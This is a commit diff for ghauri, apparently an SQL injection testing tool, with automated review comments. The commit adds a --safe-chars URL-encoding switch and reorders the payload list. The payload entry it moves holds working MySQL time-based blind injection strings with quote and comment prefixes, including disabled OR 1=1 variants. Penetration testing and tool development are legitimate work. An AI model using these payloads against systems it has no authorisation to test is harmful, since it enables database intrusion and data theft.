  • added switch to skip specific characters from urlencoding, --safe-chars

  • r0oth3x49 committed 1 year ago
    721b1de2
    1 parent b76f9400
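--- a/ghauri/common/config.py
+++ b/ghauri/common/config.py
@@ -94,6 +94,7 @@
 self.req_counter_injected = 0
 self.params_count = 0
 self.confirm_payloads = False
+self.safe_chars = None
 
 @property
 def session_filepath(self):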
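--- a/ghauri/common/payloads.py
+++ b/ghauri/common/payloads.py
@@ -430,6 +430,30 @@
 "dbms": "MySQL",
 },
 {
+"payload": "IF(now()=sysdate(),SLEEP([SLEEPTIME]),0)",
+"comments": [
+{"pref": "'XOR(", "suf": ")XOR'Z"},
+{"pref": '"XOR(', "suf": ')XOR"Z'},
+{"pref": "", "suf": ""},
+{"pref": "", "suf": "-- wXyW"},
+{"pref": "'AND(", "suf": ")AND'Z"},
+{"pref": "'OR(", "suf": ")OR'Z"},
+{"pref": '"OR(', "suf": ')OR"Z'},
+{"pref": " AND ", "suf": "-- wXyW"},
+{"pref": "' AND ", "suf": "-- wXyW"},
+{"pref": '" AND ', "suf": "-- wXyW"},
+{"pref": ") AND ", "suf": "-- wXyW"},
+{"pref": "') AND ", "suf": "-- wXyW"},
+{"pref": '") AND ', "suf": "-- wXyW"},
+# {"pref": ") OR ", "suf": "OR(1=1-- wXyW"},
+# {"pref": "') OR ", "suf": "OR('1'='1 wXyW"},
+# {"pref": '") OR ', "suf": 'OR("1"="1-- wXyW'},
+],
+"title": "MySQL >= 5.0.12 time-based blind (IF - comment)",
+"vector": "IF([INFERENCE],SLEEP([SLEEPTIME]),0)",
+"dbms": "MySQL",
+},
+{
 "payload": "(SELECT CASE WHEN(1234=1234) THEN SLEEP([SLEEPTIME]) ELSE 0 END)",
 "comments": [
 {"pref": "'XOR", "suf": "XOR'Z"},
@@ -455,30 +479,6 @@
 ],
 "title": "MySQL >= 5.0.12 time-based blind (CASE STATEMENT)",
 "vector": "(SELECT CASE WHEN([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE 0 END)",
-"dbms": "MySQL",
-},
-{
-"payload": "IF(now()=sysdate(),SLEEP([SLEEPTIME]),0)",
-"comments": [
-{"pref": "'XOR(", "suf": ")XOR'Z"},
-{"pref": '"XOR(', "suf": ')XOR"Z'},
-{"pref": "", "suf": ""},
-{"pref": "", "suf": "-- wXyW"},
-{"pref": "'AND(", "suf": ")AND'Z"},
-{"pref": "'OR(", "suf": ")OR'Z"},
-{"pref": '"OR(', "suf": ')OR"Z'},
-{"pref": " AND ", "suf": "-- wXyW"},
-{"pref": "' AND ", "suf": "-- wXyW"},
-{"pref": '" AND ', "suf": "-- wXyW"},
-{"pref": ") AND ", "suf": "-- wXyW"},
-{"pref": "') AND ", "suf": "-- wXyW"},
-{"pref": '") AND ', "suf": "-- wXyW"},
-# {"pref": ") OR ", "suf": "OR(1=1-- wXyW"},
-# {"pref": "') OR ", "suf": "OR('1'='1 wXyW"},
-# {"pref": '") OR ', "suf": 'OR("1"="1-- wXyW'},
-],
-"title": "MySQL >= 5.0.12 time-based blind (IF - comment)",
-"vector": "IF([INFERENCE],SLEEP([SLEEPTIME]),0)",
 "dbms": "MySQL",
 },
 {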
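Review bot: Moving the `IF(now()=sysdate(),SLEEP(...),0)` entry ahead of the CASE entry changes the order in which MySQL time-based probes are fired on every scan, which the commit message (only about `--safe-chars`) does not mention; if the new position is deliberate, a one-line comment above the entry such as `# tried before the CASE variant: shorter payload, survives more quote/paren contexts` would keep that intent from being lost in the next reshuffle. The three commented-out `) OR` / `') OR` / `") OR` prefix pairs are carried over verbatim as dead code; either delete them or note why they are disabled (an OR-based time probe presumably makes the condition true for every row, which is noisier and, on UPDATE/DELETE statements, potentially destructive on a target). Both hunks sit inside a list literal whose opening and closing brackets are outside the hunk.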
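--- a/ghauri/common/utils.py
+++ b/ghauri/common/utils.py
@@ -1109,10 +1109,12 @@
 is_json = conf.is_json
 is_multipart = conf.is_multipart
 safe = (
-"/=*()[]&?%;,+\"'"
+"/=*()&?%;,+\"'"
 if conf.backend == "Microsoft SQL Server" and injection_type == "POST"
-else "[]/=*?&:;,+"
+else "/=*?&:;,+"
 )
+if conf.safe_chars:
+safe = f"{conf.safe_chars}{safe}"
 if not is_json and not key == "#1*":
 text = urlencode(
 value=text,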
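Review bot: Removing `[` and `]` from both default `safe` sets changes encoding for every existing run, not only for operators who pass `--safe-chars`, and neither the commit message nor the code says so; any payload that relies on literal brackets (MSSQL `[name]` quoting is the obvious case) will now be percent-encoded unless the operator opts back in. A comment at the `safe = (` line would make the trade-off visible: `# "[]" is no longer URL-safe by default; pass --safe-chars="[]" to restore the previous behaviour`. Prepending the raw operator-supplied `conf.safe_chars` string is acceptable for a CLI tool, though characters already in `safe` will simply be duplicated (presumably harmless to `urlencode`, worth confirming). The enclosing function begins before the hunk and the `urlencode(` call continues past it.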
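--- a/ghauri/ghauri.py
+++ b/ghauri/ghauri.py
@@ -86,6 +86,7 @@
 skip_urlencoding=False,
 threads=None,
 confirm_payloads=False,
+safe_chars=None,
 ):
 verbose_levels = {
 1: logging.INFO,
@@ -97,6 +98,7 @@
 is_custom_point = False
 conf.skip_urlencoding = skip_urlencoding
 conf.confirm_payloads = confirm_payloads
+conf.safe_chars = safe_chars
 logger.start("starting")
 if not force_ssl:
 ssl._create_default_https_context = ssl._create_unverified_context
@@ -202,6 +204,10 @@
 )
 logger.end("ending")
 exit(0)
+if conf.safe_chars:
+logger.debug(
+f'Ghauri is going to skip urlencoding for provided safe character(s): "{safe_chars}"'
+)
 for injection_type in list(injection_points.keys()):
 if custom_injection_in:
 if "COOKIE" in custom_injection_in: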
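--- a/ghauri/scripts/ghauri.py
+++ b/ghauri/scripts/ghauri.py
@@ -239,6 +239,14 @@
 default=None,
 metavar="",
 )
+injection.add_argument(
+"--safe-chars",
+dest="safe_chars",
+type=str,
+help='Skip URL encoding of specific character(s): (e.g:- --safe-chars="[]"',
+default=None,
+metavar="",
+)
 detection = parser.add_argument_group(
 "Detection",
 description="These options can be used to customize the detection phase",
@@ -437,6 +445,7 @@
 skip_urlencoding=args.skip_urlencoding,
 threads=args.threads,
 confirm_payloads=args.confirm_payloads,
+safe_chars=args.safe_chars,
 )
 if resp.is_injected:
 target = ghauri.Ghauri(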
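Review bot: The help string for `--safe-chars` has an unbalanced parenthesis and an odd `e.g:-` abbreviation, and this is exactly what operators see in `--help`; suggest `help='Skip URL encoding of the given character(s) (e.g. --safe-chars="[]")'`. Because the same commit drops `[]` from the default safe set in utils.py, the help text is also the natural place to say that brackets now require this switch. `type=str` is argparse's default and can be dropped. The argument group and parser are created outside the hunk.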